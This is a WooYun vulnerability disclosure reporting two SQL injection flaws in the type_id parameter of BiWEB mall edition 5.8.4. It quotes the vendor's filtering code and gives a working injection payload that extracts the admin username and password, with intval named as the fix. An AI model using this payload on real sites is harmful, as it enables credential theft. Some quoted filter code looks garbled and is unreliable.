当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-085302

漏洞标题:BiWEB最新商城版2处注入漏洞打包

相关厂商:BiWEB

漏洞作者: 路人甲

提交时间:2014-12-02 17:31

修复时间:2015-03-02 17:32

公开时间:2015-03-02 17:32

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-12-02: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-03-02: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

BiWEB最新商城版2处注入漏洞打包

详细说明:

在wooyun上看到了有人提了BiWEB的一个XSS漏洞: WooYun: BIWEB商城版XSS盲打cookie ,也有人提了SQL注入,我来找找其他的漏洞吧。去官网下BiWEB商城版最新的5.8.4来看看。
注入点是http://xxxx.com/product/list.php?type_id=1,其中type_id存在多处注入漏洞。
第一处注入存在于/product/include/list.inc.php中的$objWebInit->getNavRouteInfo($_GET['type_id'])语句中;
第二处注入存在于/product/block/child_brand.php中的$arrTopInfo = $objproduct->getBrandWithProductType($_GET['type_id'])语句中;
下面来以第一处注入漏洞来说明,第二处的注入方法请参考我的这个漏洞:http://wooyun.org/bugs/wooyun-2014-085024
先来看看BiWEB是怎么处理防注入的。首先BiWEB对用户输入进行了全局过滤filtrate.inc.php

<?php
//过滤GET或POST的值,去除两端空格和转义符号
if ($_SERVER['REQUEST_METHOD'] == 'POST'){
	check::filtrateData($_POST,$arrGPdoDB['htmlspecialchars']);
}elseif($_SERVER['REQUEST_METHOD'] == 'GET'){
	check::filtrateData($_GET,$arrGPdoDB['htmlspecialchars']);
}
?>


filtrateData()方法的实现见下面

/**
	 * filtrateData($ParamValue)
	 * 作 用:递归去除所有值两边的空白
	 * @author	Arthur <ArthurXF@gmail.com>
	 * @param	$ParamValue (需要过滤空白的数据)
	 * @param	array	$arrHtml (不需要过滤的数据key组成的数组)
	 * @return	去除空白之后的数据
	 * 备 注:无
	 */
	static function filtrateData(&$ParamValue,$arrHtml){
		if (is_array($ParamValue)){
			foreach ($ParamValue as $key=>$value){
				if(is_array($value)){
					check::filtrateData($value,$arrHtml);
				}else{
					if(v === 'v' || v === '' || strpos(p,v)) exit;
					if($key === 'v') {
						echo v;exit;
					}
					if(count($arrHtml)){
						if(in_array($key,$arrHtml)) $ParamValue[$key] = trim($value);
						else $ParamValue[$key] = htmlspecialchars(trim($value), ENT_QUOTES);
					}else $ParamValue[$key] = htmlspecialchars(trim($value), ENT_QUOTES);
				}
			}
		}else{
			$ParamValue = trim($ParamValue);
		}
	}


在/product/include/list.inc.php中有一处数字型的注入

无关代码
//取得产品分类的导航信息
$arrNavInfo = array();
if (!empty($_GET['type_id'])) {
	$objWebInit->getNavRouteInfo($_GET['type_id']);
}
无关代码


继续去看看getNavRouteInfo(),在/product/class/product.class.php中

/**
	 * 通过 type_id ,递归取出 路由信息,用于导航 分类一 => 分类一一 => 分类一一一
	 * @author	嬴益虎 (whoneed@126.com)
	 * @param	int $type_id		分类id
	 * @return  array
	 */
	function getNavRouteInfo($type_id){
		global $arrNavInfo;
		$strWhere = "where type_pass=1 and type_id=$type_id";
		$arrProductType = $this->getTypeList($strWhere);
		$arrTemp = array();
		$arrTemp['type_id']		= $arrProductType['0']['type_id'];
		$arrTemp['type_title']  = $arrProductType['0']['type_title'];
		if($arrProductType['0']['type_parentid'] != 0){//不是顶级分类
			$this->getNavRouteInfo($arrProductType['0']['type_parentid']);
			$arrNavInfo[] = $arrTemp;
		}else {
			$arrNavInfo[] = $arrTemp;
		}
	}


虽然有全局过滤,这里的type_id是数字型的,而全局过滤只是使用了htmlspecialchars对几个特殊符号进行了编码,这里不使用这几个特殊符号就可以绕过了。payload如下

Payload:
http://xxxx.com/product/list.php?type_id=1/**/or/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x23,(select/**/concat(user_name,0x23,password,0x23)from/**/biweb_user/**/limit/**/0,1),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)


成功注入,管理员用户名及密码如下图中所示:

注入成功副本.jpg

漏洞证明:

见 详细说明

修复方案:

intval

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞评价:

评论